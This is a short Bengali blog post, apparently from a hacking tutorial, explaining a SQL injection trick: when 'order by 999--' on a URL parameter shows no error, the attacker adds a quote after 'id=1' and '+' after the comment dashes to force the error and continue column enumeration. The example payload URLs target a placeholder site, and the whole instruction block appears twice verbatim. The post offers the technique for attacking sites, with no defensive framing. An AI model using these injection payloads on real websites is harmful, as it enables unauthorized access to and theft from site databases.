অনেক সময় দেখা যায়
www.xample.com/index.php?id=1 order 999-- [ no error ]
অর্থাৎ order by 999 দিলেও কোন error দেখায় না ।
এক্ষেত্রে -- এর পর + এবং id=1 এর পর ' sign দিতে হবে ।
তাহলে সম্পূর্ণ লিঙ্কটি হবে
www.xample.com/index.php?id=1' order by 999--+
এবার পেজে আগের মত error দেখাবে ।
বাকি অংশগুলো সাধারন SQL Injection এর মতই হবে ।
www.xample.com/index.php?id=1 order 999-- [ no error ]
অর্থাৎ order by 999 দিলেও কোন error দেখায় না ।
এক্ষেত্রে -- এর পর + এবং id=1 এর পর ' sign দিতে হবে ।
তাহলে সম্পূর্ণ লিঙ্কটি হবে
www.xample.com/index.php?id=1' order by 999--+
এবার পেজে আগের মত error দেখাবে ।
বাকি অংশগুলো সাধারন SQL Injection এর মতই হবে ।
0 comments:
Post a Comment